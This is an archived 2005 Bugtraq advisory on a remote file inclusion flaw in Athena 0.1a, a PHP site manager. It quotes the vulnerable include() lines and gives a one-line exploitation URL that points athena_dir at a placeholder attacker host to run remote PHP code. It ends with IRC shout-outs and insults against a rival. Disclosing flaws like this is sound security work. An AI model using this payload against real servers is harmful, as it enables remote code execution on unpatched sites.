lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: 26 Nov 2005 22:23:18 -0000
From: gb.network@...il.com
To: bugtraq@...urityfocus.com
Subject: Remote file include in Athena


Language: PHP
Script: Athena
Version: 0.1a
Official website: http://sourceforge.net/projects/athena
Problem: Remote file inclusion
Discovered by: beford & ][GB][
 
Description:
===========
 
A simple website management system written in oo php that uses a mysql database 
to store user and group rights and the site content.
 
Problem:
========
A remote user can include and execute arbitrary PHP code from the remote location.
The problem is in the file "athena.php" for line 1 to 10:

include("$athena_dir/headers.php"); 
include("$athena_dir/classes/debug.php");
include("$athena_dir/classes/mysql.php");
include("$athena_dir/classes/config.php");
include("$athena_dir/classes/page.php");
include("$athena_dir/classes/session.php");
include("$athena_dir/classes/user.php");
include("$athena_dir/classes/error.php");
include("$athena_dir/classes/modules.php");
include("$athena_dir/classes/admin.php");

 
Explotation example:
===================

http://[target]/path_to_athena/athena.php?athena_dir=http://[attacker_url]

 
Solution:
========
 
Not solution at this time.
 
 
Greetz:
=======
 
uyx, beford, Zetha, lithyum,_|MALANDDO|_ ,desKrriado, |LINUX|, Amon-Ra, Extremo, SecretDreams, caffa
 
&& irc.gigachat.net #uruguay, #h4ck3rsbr, #IYS, #D.O.M, #MSR ,,, irc.fullnetwork.org #full, #f4kelive
   
irc.org.ve #uruguay, #venezuela
 
Fuckz:
=====
Morgan lamer and his irc.irc-argentina.org, his small ddos-botnet, its hidden in that server, the bot
s are
supposed to be argentinian users but noooo, he is using that ripped worm code i mentioned before!!!
he is such a leet h4x0r from santiago del estero (.ar)! hahahhaa


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ